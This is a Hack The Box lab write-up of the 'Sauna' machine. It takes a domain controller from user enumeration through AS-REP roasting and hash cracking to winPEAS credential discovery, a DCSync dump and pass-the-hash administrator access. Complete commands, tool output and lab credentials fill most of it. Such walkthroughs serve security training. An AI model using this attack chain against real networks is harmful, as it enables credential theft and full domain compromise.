Sauna

AD box on HTB.

Enumeration:

As always we are going to start with nmap to scan for open ports:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oN nmap/services.nmap -vv 10.129.135.36
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-03 14:12 EDT
Nmap scan report for 10.129.135.36                                                   
Host is up, received echo-reply ttl 127 (0.14s latency).                                                                                                                   
Scanned at 2025-09-03 14:12:14 EDT for 257s
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION             
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus      
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0           
|_http-server-header: Microsoft-IIS/10.0                                             
| http-methods:                                                                      
|   Supported Methods: OPTIONS TRACE GET HEAD POST                 
|_  Potentially risky methods: TRACE                                                 
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-04 01:13:16Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127                  
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 
|_http-title: Not Found                                                              
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
<snipped>                                                                                                  
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>
|_clock-skew: 7h00m03s
<snipped>

We have the default open ports on a domain controller, and this time we have http running on port 80, and the domain name mentioned in the ldap banner result, and the host name of the machine is SAUNA.

Also we can see that the clock-skew is too great so I will use ntpdate to synchronize with the target machine if we wanted to interact with Kerberos.

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ sudo ntpdate 10.129.135.36

And I will add the IP and the corresponding domain name to the hosts file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ cat /etc/hosts        
127.0.0.1       localhost
127.0.1.1       kali
<snipped>

10.129.135.36 SAUNA.EGOTISTICAL-BANK.LOCAL EGOTISTICAL-BANK.LOCAL SAUNA

User Enumeration:

Now I will start with the web application, lets open it up with Firefox:

If we went to about us page, we will find some potential usernames:

I will save those names into a file and use a tool called username-wordlist-generator.py to create a list of different variation of naming forms:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ cat user.txt 
Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driver

┌──(kali㉿kali)-[/opt/Tools/username-wordlist-generator]
└─$ python3 userlistcreator.py                                                                                                                                             
                                                                                                                                                                           
                                                                                                                                                                           
                    USERNAME GENERATOR                                                                                                                                     
--------------------------------------------------------                                                                                                                   Help :                                                                                                                                                                     
     Add name of users to :/opt/Tools/username-wordlist-generator/user.txt                                                                                                 
             (Then Restart The Program)                                                                                                                                    
                          v2.0                                                                                                                                             
--------------------------------------------------------                                                                                                                   
                                                                                                                                                                           [*] Names Loaded :                                                                                                                                                                 + Fergus Smith                                                                                                                                                     
        + Hugo Bear                                                                                                                                                        
        + Steven Kerb                                                                                                                                                      
        + Shaun Coins                                                                                                                                                      
        + Bowie Taylor                                                                                                                                                     
        + Sophie Driver                                                                                                                                                    
                                                                                                                                                                           
[*] Started Converting.....                                                                                                                                                
[*] Successfully Created Usernames                                                                                                                                         
[*] Saving File....                                                                                                                                                        
[*] File Saved to : /opt/Tools/username-wordlist-generator/output.txt                                                                                                      
[*] Happy Hacking .............

If we take a look at the output.txt file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ cat /opt/Tools/username-wordlist-generator/output.txt
Fergus-Smith
Fergus_Smith
Fergus.Smith
Fergus Smith
FergusSmith
FSmith
FergusS
F-Smith
F_Smith
F.Smith
Fergus-S
Fergus_S
Fergus.S
FS
Hugo-Bear
<snipped>

We can also convert all entries in this output file to lowercase, so we can then try them as passwords for example.

Now I will use kerbrute to enumerate those users to try to find any valid domain users:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ kerbrute userenum -d egotistical-bank.local --dc 10.129.135.36 /opt/Tools/username-wordlist-generator/output.txt
                                                                                     
    __             __               __                                               
   / /_____  _____/ /_  _______  __/ /____                                           
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \                                                                                                                                
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/                                          
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                           
                                                                                     
Version: v1.0.3 (9dad6e1) - 09/03/25 - Ronnie Flathers @ropnop                       
                                                                                     
2025/09/03 14:19:21 >  Using KDC(s):                                                 
2025/09/03 14:19:21 >   10.129.135.36:88                                             
                                                                                     
2025/09/03 14:19:21 >  [+] VALID USERNAME:       FSmith@egotistical-bank.local       
2025/09/03 14:19:24 >  Done! Tested 84 usernames (1 valid) in 3.314 seconds

We only have one valid domain user out of the output.txt file.

Lets save it into a file.

AS-REP Roasting:

Here we can perform several attacks such as password spraying, AS-REP Roasting, etc.

I tried AS-REP Roasting using impacket-GetNPUsers to perform it:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ impacket-GetNPUsers egotistical-bank.local/ -usersfile users.txt                                                  
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:b01a685e5e90d37162daad1a906e3a40$a8820e46d7ef70264b6dc67995452dae75fef5cd7513536277411af47b17dcc1b26453515f6fdf35dd586ddd12021e
9d9ea8a07702a56b10c3992b0678c6d41888346629e07c90e2c4b01500c79f41cca8440f1dc4c802f72bcfbea2ca2005cfcaeb5ef54cb32d9473f39bca25582e7967048fbeb67bde1dc976b7dbc6098421764fedfe2
c55302e36951010673f166d2f3507e12f683568743560aa2ccc39fa4f422e03683b1c4b3d16d99d1763d6a08cb6f6e53282b7d7003e6a4ef8deb62ccbadcc31da2cbbcd3aacb3ac7913415e746a44e3c0d10a4e096d
2c072fa44152012fece764a351a58982fab79d456f8a9f577f8bc3738735172d78b23484b045

And indeed fsmith is AS-REP Rostable user.

Now I will try to crack it using hashcat:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ hashcat fsmith.hash /usr/share/wordlists/rockyou.txt      
hashcat (v6.2.6) starting in autodetect mode

<snipped>

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:b01a685e5e90d37162daad1a906e3a40$a8820e46d7ef70264b6dc67995452dae75fef5cd7513536277411af47b17dcc1b26453515f6fdf35dd586ddd12021e
9d9ea8a07702a56b10c3992b0678c6d41888346629e07c90e2c4b01500c79f41cca8440f1dc4c802f72bcfbea2ca2005cfcaeb5ef54cb32d9473f39bca25582e7967048fbeb67bde1dc976b7dbc6098421764fedfe2
c55302e36951010673f166d2f3507e12f683568743560aa2ccc39fa4f422e03683b1c4b3d16d99d1763d6a08cb6f6e53282b7d7003e6a4ef8deb62ccbadcc31da2cbbcd3aacb3ac7913415e746a44e3c0d10a4e096d
2c072fa44152012fece764a351a58982fab79d456f8a9f577f8bc3738735172d78b23484b045:Thestrokes23
                                                           
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:b01a685...84b045
Time.Started.....: Wed Sep  3 14:21:25 2025 (7 secs)
Time.Estimated...: Wed Sep  3 14:21:32 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1462.4 kH/s (0.95ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10540032/14344385 (73.48%)
Rejected.........: 0/10540032 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> ThatHadToHurt
Hardware.Mon.#1..: Util: 23%

<snipped>

Now we have valid credentials.

No interesting shares.

BloodHound:

Since we have valid credentials that is the time for BloodHound, lets collect the domain data using netexec, and upload the output to BloodHound:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ netexec ldap 10.129.135.36 -u fsmith -p Thestrokes23 --bloodhound -c all --dns-server 10.129.135.36
LDAP        10.129.135.36   389    SAUNA            [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
LDAP        10.129.135.36   389    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 
LDAP        10.129.135.36   389    SAUNA            Resolved collection methods: group, objectprops, rdp, localadmin, psremote, acl, session, trusts, dcom, container
LDAP        10.129.135.36   389    SAUNA            Done in 00M 47S
LDAP        10.129.135.36   389    SAUNA            Compressing output into /home/kali/.nxc/logs/SAUNA_10.129.135.36_2025-09-03_142626_bloodhound.zip

Start BloodHound:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]                                                                                                                        
└─$ sudo bloodhound                                                                                                                                                        
[sudo] password for kali:                                                                                                                                                  
                                                                                                                                                                           
 Starting neo4j                                                                                                                                                            
Neo4j is not running.                                                                                                                                                      
Directories in use:                                                                                                                                                        
home:         /usr/share/neo4j                                                                                                                                             
config:       /usr/share/neo4j/conf                                                                                                                                        
logs:         /etc/neo4j/logs                                                                                                                                              
plugins:      /usr/share/neo4j/plugins                                                                                                                                     
import:       /usr/share/neo4j/import                                                                                                                                      
data:         /etc/neo4j/data                                                                                                                                              
certificates: /usr/share/neo4j/certificates                                                                                                                                
licenses:     /usr/share/neo4j/licenses                                                                                                                                    
run:          /var/lib/neo4j/run                                                                                                                                           
Starting Neo4j.                                                                                                                                                            
Started neo4j (pid:10457). It is available at http://localhost:7474                                                                                                        
There may be a short delay until the server is ready.                                                                                                                      
...................................................                                                                                                                        
 Bloodhound will start                                                                                                                                                     
                                                                                                                                                                           
 IMPORTANT: It will take time, please wait...

<snipped>

 opening http://127.0.0.1:8080

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ mv /home/kali/.nxc/logs/SAUNA_10.129.135.36_2025-09-03_142626_bloodhound.zip .

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ unzip SAUNA_10.129.135.36_2025-09-03_142626_bloodhound.zip 
Archive:  SAUNA_10.129.135.36_2025-09-03_142626_bloodhound.zip
 extracting: SAUNA_10.129.135.36_2025-09-03_142626_gpos.json  
 extracting: SAUNA_10.129.135.36_2025-09-03_142626_groups.json  
 extracting: SAUNA_10.129.135.36_2025-09-03_142626_containers.json  
 extracting: SAUNA_10.129.135.36_2025-09-03_142626_users.json  
 extracting: SAUNA_10.129.135.36_2025-09-03_142626_computers.json  
 extracting: SAUNA_10.129.135.36_2025-09-03_142626_domains.json  
 extracting: SAUNA_10.129.135.36_2025-09-03_142626_ous.json

I did not find anything interesting, but the fsmith is a Remote Management User which means we can WinRM to the machine.

Privilege Escalation:

AutoLogon Credentials:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]                                                                                                                        
└─$ evil-winrm -i 10.129.135.36 -u fsmith -p Thestrokes23                                                                                                                  
                                                                                                                                                                           
Evil-WinRM shell v3.7                                                                                                                                                      
                                                                                                                                                                           
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                           
                                                                                                                                                                           
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                      
                                                                                                                                                                           
Info: Establishing connection to remote endpoint

And I will upload winPEAS.exe to the target machine to find any attack vector that we can take advantage to get to domain admins.

*Evil-WinRM* PS C:\Users\FSmith> upload winPEASany.exe   
                                                                                                                  
Info: Uploading /home/kali/Desktop/CTF/Machines/HackTheBox/Sauna/winPEASany.exe to C:\Users\FSmith\winPEASany.exe                                                          
                                                                                                                                                                           
Data: 13541376 bytes of 13541376 bytes copied                                                                                                                              
                                                                                                                                                                           
Info: Upload successful!

Now lets run winPEAS.exe:

*Evil-WinRM* PS C:\Users\FSmith> .\winPEASany.exe                                                                                                      14:59:27 [1596/2110]
 [!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search m
ight take several minutes. For help, run winpeass.exe --help                                                                                                               
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t RE
G_DWORD /d 1' and then start a new CMD                                                                                                                                     
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable i
t with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD                                       
                                                                                                                                                                           
               ((((((((((((((((((((((((((((((((                                                                                                                            
        (((((((((((((((((((((((((((((((((((((((((((                                                                                                                        
      ((((((((((((((**********/##########(((((((((((((                                                                                                                     
    ((((((((((((********************/#######(((((((((((                                                                                                                    
    ((((((((******************/@@@@@/****######((((((((((                                                                                                                  
    ((((((********************@@@@@@@@@@/***,####((((((((((                                                                                                                
    (((((********************/@@@@@%@@@@/********##(((((((((                                                                                                               
    (((############*********/%@@@@@@@@@/************((((((((                                                                                                               
    ((##################(/******/@@@@@/***************((((((                                                                                                               
    ((#########################(/**********************(((((                                                                                                               
    ((##############################(/*****************(((((                                                                                                               
    ((###################################(/************(((((                                                                                                               
    ((#######################################(*********(((((                                                                                                               
    ((#######(,.***.,(###################(..***.*******(((((                                                                                                               
    ((#######*(#####((##################((######/(*****(((((                                                                                                               
    ((###################(/***********(##############()(((((                                                                                                               
    (((#####################/*******(################)((((((                                                                                                               
    ((((############################################)((((((                                                                                                                
    (((((##########################################)(((((((                                                                                                                
    ((((((########################################)(((((((                                                                                                                 
    ((((((((####################################)((((((((                                                                                                                  
    (((((((((#################################)(((((((((                                                                                                                   
        ((((((((((##########################)(((((((((                                                                                                                     
              ((((((((((((((((((((((((((((((((((((((                                                                                                                       
                 ((((((((((((((((((((((((((((((                                                                                                                            

ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the auth
or or of any other collaborator. Use it at your own devices and/or with the device owner's permission.

  WinPEAS-ng by @hacktricks_live

       /---------------------------------------------------------------------------------\
       |                             Do you like PEASS?                                  |
       |---------------------------------------------------------------------------------|
       |         Learn Cloud Hacking       :     training.hacktricks.xyz                 |
       |         Follow on Twitter         :     @hacktricks_live                        |
       |         Respect on HTB            :     SirBroccoli                             |
       |---------------------------------------------------------------------------------|
       |                                 Thank you!                                      |
       \---------------------------------------------------------------------------------/

  [+] Legend:
         Red                Indicates a special privilege over an object or something is misconfigured
         Green              Indicates that some protection is enabled or something is well configured
         Cyan               Indicates active users
         Blue               Indicates disabled users
         LightYellow        Indicates links

After going through and analyzing the results I found those autologon credentials for svc_loanmgr:

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for AutoLogon credentials                                                                                                                             
    Some AutoLogon credentials were found                                                                                                                                  
    DefaultDomainName             :  EGOTISTICALBANK                                                                                                                       
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager                                                                                                       
    DefaultPassword               :  Moneymakestheworldgoround!

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ netexec smb 10.129.135.36 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
SMB         10.129.135.36   445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False) 
SMB         10.129.135.36   445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!

DCSync Attack:

Now if we went back to BloodHound to find any interesting ACLs this user has over any other objects by clicking on Outbound Object Control:

We can see that the user svc_loanmgr has GetChangesAll and GetChanges (DS-Replication-Get-Changes-All & DS-Replication-Get-Changes), which means we have DCSync rights.

Lets perform the DCSync via impacket-secretsdump:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ impacket-secretsdump egotistical-bank.local/svc_loanmgr:'Moneymakestheworldgoround!'@10.129.135.36                
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies                                                                                                 
                                                                                     
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied                                                                                         
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                                                                                              
[*] Using the DRSUAPI method to get NTDS.DIT secrets      
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1****************:::                                     
<snipped>                                                                                                                                   
[*] Cleaning up...

Now we can authenticate to the target with WinRM or via psexec:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]                                  
└─$ evil-winrm -i 10.129.135.36 -u administrator -H 823452073d75b9d1****************            
                                         
Evil-WinRM shell v3.7
                                         
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                         
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                         
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
SAUNA
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::7c64:47f8:c009:bccb
   Link-local IPv6 Address . . . . . : fe80::7c64:47f8:c009:bccb%7
   IPv4 Address. . . . . . . . . . . : 10.129.135.36
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%7
                                       10.129.0.1

And we can read the flags:

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
be155c28c4c3d715****************
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\fsmith\Desktop\user.txt
5773859b9b0e369a****************

PreviousForest NextMonteverde

Last updated 5 months ago

hashtagEnumeration:

hashtagUser Enumeration:

hashtagAS-REP Roasting:

hashtagBloodHound:

hashtagPrivilege Escalation:

hashtagAutoLogon Credentials:

hashtagDCSync Attack: